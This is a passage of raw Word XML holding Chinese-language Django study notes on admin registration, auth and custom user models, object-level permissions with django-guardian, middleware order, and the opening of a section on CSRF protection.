          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">test_app.models </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为了让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>界面管理某个数据模型，我们需要先注册该数据模型到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin.site.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1EB18A" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="0077153A" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238DCE9B" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123BDC97" w14:textId="70D0A83F" w:rsidR="00917C6F" w:rsidRDefault="000B42F1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="645" w:name="_Toc159780075"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>auth</w:t>
      </w:r>
      <w:r w:rsidR="004C32DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="004C32DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="004C32DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="645"/>
    </w:p>
    <w:p w14:paraId="5657AC10" w14:textId="5AA56397" w:rsidR="004C32DF" w:rsidRPr="004C32DF" w:rsidRDefault="004C32DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236783C9" w14:textId="6A85B61E" w:rsidR="000B42F1" w:rsidRDefault="000B42F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05355302" w14:textId="7AA1267A" w:rsidR="00F108B1" w:rsidRDefault="001E4354" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId166" w:history="1">
        <w:r w:rsidRPr="00593E13">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://www.runoob.com/django/django-auth.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的认证登录</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE21CE" w14:textId="3CB540D4" w:rsidR="00F108B1" w:rsidRDefault="001E4354" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r w:rsidRPr="00593E13">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://zhuanlan.zhihu.com/p/76795134</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（含模块级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>permission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的鉴权）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AF1A3" w14:textId="3E23D0E0" w:rsidR="000B42F1" w:rsidRPr="00EB6839" w:rsidRDefault="000B42F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8A3CE3" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4E9480" w14:textId="24F65533" w:rsidR="00917C6F" w:rsidRDefault="004C32DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r w:rsidRPr="00BB25D8">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://zhuanlan.zhihu.com/p/51545082</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D98FA40" w14:textId="77777777" w:rsidR="00F108B1" w:rsidRDefault="00F108B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCDD465" w14:textId="504AD0C3" w:rsidR="006928A8" w:rsidRDefault="006928A8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="646" w:name="_Toc159780076"/>
      <w:r w:rsidRPr="006928A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r w:rsidRPr="006928A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义用户类</w:t>
      </w:r>
      <w:r w:rsidRPr="006928A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User Model</w:t>
      </w:r>
      <w:r w:rsidRPr="006928A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的两种方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="646"/>
    </w:p>
    <w:p w14:paraId="67D97559" w14:textId="01F360E9" w:rsidR="006928A8" w:rsidRDefault="006928A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006928A8">
        <w:t>https://blog.csdn.net/qq_29892201/article/details/108258457</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39755865" w14:textId="77777777" w:rsidR="006928A8" w:rsidRDefault="006928A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20631A5D" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EEB1E3" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D78EF5A" w14:textId="681F1135" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="647" w:name="_Toc159780077"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象级权限管理</w:t>
      </w:r>
      <w:r w:rsidRPr="0089343E">
        <w:t>Django-guardian</w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
    </w:p>
    <w:p w14:paraId="0050935D" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0089343E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r w:rsidRPr="0089343E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认的权限分配最小粒度是表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是说一旦我们给了用户这个表的修改权限，那么用户就可以修改表里的所有数据，这在某些情况下是无法满足需求的，例如对于一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文章表来说，我们规定用户只能修改自己的文章，而不能修改别人的文章，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认权限机制就无法做到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31FECD" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F08C8CC" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那该如何实现上述需求呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置权限扩展案例文章就给了实现的方法，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表新加字段来标识谁有修改的权限即可，试想如果我们有很多表都需要类似的权限控制呢？就需要不断的来添加字段标识权限，这种方案的弊端马上显现，那么有没有一种更为优雅的方案来解决呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C0AE2" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A2F786" w14:textId="2C0A5299" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于对象的权限控制就是很好的方法，他的权限控制粒度为表中的对象，可以给每一个对象赋予权限，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django-guardian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>便是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的原生逻辑扩展出来的对象权限控制方案，他扩展了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认权限方案，从而使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的权限控制机制更加完善</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5746251A" w14:textId="77777777" w:rsidR="0089343E" w:rsidRPr="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A211BB" w14:textId="4EC9714D" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="0089343E">
        <w:t>https://blog.csdn.net/weixin_42134789/article/details/105963583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C271070" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78FF82D0" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C4B23F" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476828A4" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C854D1" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E36003D" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F950A1" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D98BA77" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096DAA11" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6544A53F" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1C32ED" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566DFB1E" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5837A36F" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D25CF2" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F79765F" w14:textId="77777777" w:rsidR="0089343E" w:rsidRDefault="0089343E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567B7BEF" w14:textId="4488EE13" w:rsidR="00917C6F" w:rsidRDefault="003A360B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="648" w:name="_Toc159780078"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="648"/>
    </w:p>
    <w:p w14:paraId="5A4E5444" w14:textId="298B1A80" w:rsidR="00917C6F" w:rsidRDefault="00A571ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺序不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A571ED">
        <w:t>process_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A571ED">
        <w:t>process_view</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A571ED">
        <w:t>process_response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C721C8" w14:textId="2C305DEB" w:rsidR="00A571ED" w:rsidRDefault="00A571ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而是如图所示，每个中间件的一层一层执行才执行下一个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03A9BF" w14:textId="1181F124" w:rsidR="00917C6F" w:rsidRDefault="003A360B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B29968F" wp14:editId="7C21AE7D">
            <wp:extent cx="5274310" cy="5274310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="12269709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4993AD39" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C37BE19" w14:textId="720DB93A" w:rsidR="00DE4DF4" w:rsidRDefault="00DE4DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="649" w:name="_Toc159780079"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何防范</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
    </w:p>
    <w:p w14:paraId="5FEFB031" w14:textId="0B2CC7DF" w:rsidR="00DE4DF4" w:rsidRDefault="00DE4DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE4DF4">
        <w:t>http://newblog.colinspace.com/blog/post/8/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41693D52" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D77F78B" w14:textId="2B6E0B7A" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="650" w:name="_Toc159780080"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="650"/>
    </w:p>
    <w:p w14:paraId="2FBB6584" w14:textId="6AF8CC45" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>部分论述参考下面邻近节的关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>、跨域、</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>的论述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529977B" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F743E22" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意攻击者成功插入恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码来进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，该代码确实可能读取浏览器中的</w:t>
      </w:r>
      <w:r>
